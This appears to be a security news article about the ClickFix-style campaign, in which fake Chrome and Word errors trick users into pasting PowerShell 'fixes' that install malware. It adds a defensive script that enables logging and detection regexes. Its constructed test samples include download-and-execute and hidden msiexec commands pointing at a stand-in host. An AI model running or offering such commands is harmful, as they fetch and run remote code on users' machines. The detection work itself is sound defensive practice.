Chrome Security Alert - Clicking on this error will open the malware floodgates on your PC

Hackers love tricking victims into doing things they would never do otherwise, and the new malware campaign currently doing the rounds online is a perfect example of this.

As reported by BleepingComputer, hackers are using fake Google Chrome and Microsoft Word errors to trick potential victims into running malicious PowerShell "fixes" that actually install malware.

This particular campaign has been very effective and has been used in attacks by multiple hacker groups (including the one behind ClearFake, a new group called ClickFix, and the TA571 group). 

Here's all you need to know about this new malware campaign, and how you can avoid falling victim to the social engineering it uses to infect your Windows PC with malware.

Similar to the previous ClearFake campaign, this new campaign uses overlays to display fake Chrome and Word errors. Potential victims are asked to click a button that copies a "fix" for these fake errors, then paste the copied code into the Windows Run dialog or a PowerShell prompt.

In a new report highlighting all the different attack chains used in the campaign, Proofpoint said that compromised websites which use Binance's Smart Chain contracts to load malicious scripts hosted on the blockchain could also infect vulnerable Windows PCs with malware.

This script performs some checks before displaying a fake Google Chrome warning claiming that the web page in question cannot be displayed. From here, you are prompted to install a "Root Certificate" by copying a PowerShell script and running it in a Windows PowerShell (Administrator) console.

Running this PowerShell script will perform more checks to ensure that the device in question is a valid target before downloading additional payloads containing information-stealing malware.

Finally, there is also an email-based infection chain that uses HTML attachments designed to resemble Word documents. They urge potential victims to install a "Word Online" extension to view the document, but, like the other attack chains used in this campaign, the "fix" consists of PowerShell commands that must be copied and pasted into PowerShell.

In this attack chain, the PowerShell commands download and run either MSI files or VBS scripts to infect the target PC with either Matanbuchus or DarkGate malware.

The three different attack chains used in this campaign all rely on the fact that most Windows users are not aware of the dangers of running unknown PowerShell commands on their PCs. This is why you should never copy and run code unless you know exactly what it does.
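Because every chain in this campaign ends with a pasted PowerShell command, the most useful thing a defender can do is make sure those commands are recorded and then look for the pattern they share: a download chained into execution, a hidden window, or MSI/VBS staging. The following is an added example written for this article, not code from BleepingComputer, Proofpoint or the campaign itself. It enables PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), defines a small indicator check, runs it against a few constructed sample commands, and then applies the same check to the live log. The registry path and event log name are real; the sample commands and the `example.invalid` host are constructed, and the two-indicator threshold is a choice you can tune.

```powershell
# Added example: record and hunt for pasted "fix" commands. Run as Administrator.

# 1. Enable script block logging so anything pasted into Run or a console is captured.
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
Set-ItemProperty -Path $key -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord

# 2. Indicators typical of copy-and-paste lures: a web download, execution of the
#    downloaded text, a hidden window, an encoded command, or MSI/VBS staging.
$indicators = @(
    'Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient|DownloadString|DownloadFile',
    'Invoke-Expression|\biex\b',
    '-w(indowstyle)?\s+hidden',
    '-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}',
    'msiexec|\.msi\b|wscript|cscript|\.vbs\b'
)

function Test-SuspiciousScriptBlock {
    param([string]$Text)
    # Count how many distinct indicator families appear in the script block.
    $hits = foreach ($pattern in $indicators) {
        if ($Text -match $pattern) { $pattern }
    }
    # A single download or a single msiexec is common in admin work; two or more
    # families together (download + execute, hidden + staging) is the lure shape.
    return (@($hits).Count -ge 2)
}

# 3. Constructed sample script blocks (not real campaign samples) to show the logic.
$samples = @(
    'iwr https://example.invalid/fix.txt | iex',
    'powershell -w hidden -c "msiexec /i https://example.invalid/update.msi /qn"',
    'Get-ChildItem C:\Users | Select-Object Name'
)
foreach ($s in $samples) {
    $verdict = if (Test-SuspiciousScriptBlock $s) { 'SUSPECT' } else { 'ok' }
    '{0,-8} {1}' -f $verdict, $s
}

# 4. Apply the same check to the live log. Empty output is expected if logging
#    was only just enabled; Properties[2] of a 4104 event is the ScriptBlockText.
$filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
Get-WinEvent -FilterHashtable $filter -MaxEvents 500 -ErrorAction SilentlyContinue |
    Where-Object { Test-SuspiciousScriptBlock $_.Properties[2].Value } |
    Select-Object TimeCreated, @{ n = 'ScriptBlock'; e = { $_.Properties[2].Value } }
```

The first two constructed samples are flagged and the third is not. On a fleet you would forward the 4104 events to your SIEM and run the same regexes there; the value of the local version is that it also works on a single machine that has no central logging, which is exactly the kind of home PC this campaign targets.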

Similarly, you should make sure that Windows Defender is enabled and running on your PC so that it can catch malware dropped by these malicious PowerShell scripts. If you want even more protection, additional security software on top of Microsoft's built-in protection can help against campaigns that use overlays to trick potential victims, and such suites often come with extras like VPNs and password managers.

Above all, take a minute to stop and think. Hackers often try to instill a sense of urgency in their attacks so that you act without thinking. Instead, read the messages carefully and search for them online to see whether they are genuine. Even if you don't find any information online, in most cases doing nothing is the best course of action.

Overlay attacks are very effective because they often appear as if they are coming from the software you are currently using. But by learning how they work and knowing what to watch out for, you can keep your devices and data safe.
